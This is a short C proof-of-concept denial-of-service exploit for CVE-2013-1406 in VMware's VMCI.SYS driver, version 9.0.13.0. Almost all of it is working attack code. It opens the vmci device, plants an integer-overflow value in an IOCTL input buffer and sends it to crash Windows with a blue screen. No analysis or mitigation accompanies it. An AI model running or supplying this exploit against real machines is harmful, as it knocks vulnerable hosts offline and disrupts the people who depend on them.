CVE-2013-1406 PoC DOS exploit

1. /*
2. This PoC only for version
3. VMCI.SYS 9.0.13.0
4. */
5.  
6. #include "stdafx.h"
7. #include "windows.h"
8.  
9. #define count_massive 0x189        
10. #define ioctl_vmsock  0x8103208C
11. #define integer_overflow_size 0x12492492;
12.  
13.  
14. int _tmain(int argc, _TCHAR* argv[])
15. {
16.     HANDLE vmci_device;
17.     DWORD bytesRet;
18.     int inbuf [count_massive];
19.     int outbuf[count_massive];
20.     int size_=count_massive*sizeof(int);
21.    
22.     printf("**************************************************\r\n");
23.     printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
24.     printf("**************************************************\r\n");
25.     //opening vmci interface device
26.     vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
27.     if (vmci_device!=INVALID_HANDLE_VALUE)
28.     {
29.         printf("[+]vmci device opened \r\n");
30.         //prepare input buffer
31.         memset(&inbuf,0,size_);
32.         //vulnerable to integer overflowing parameter
33.         inbuf[4]=integer_overflow_size;
34.         printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
35.         //Delaying signed with Diablo stamp :D
36.         Sleep(0x29a);
37.         Sleep(0x1000);
38.         DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
39.         CloseHandle(vmci_device);
40.     }
41.     else
42.     {
43.         printf("[-]Error: Can't open vmci device!\r\n");
44.     }
45.     return 0;
46. }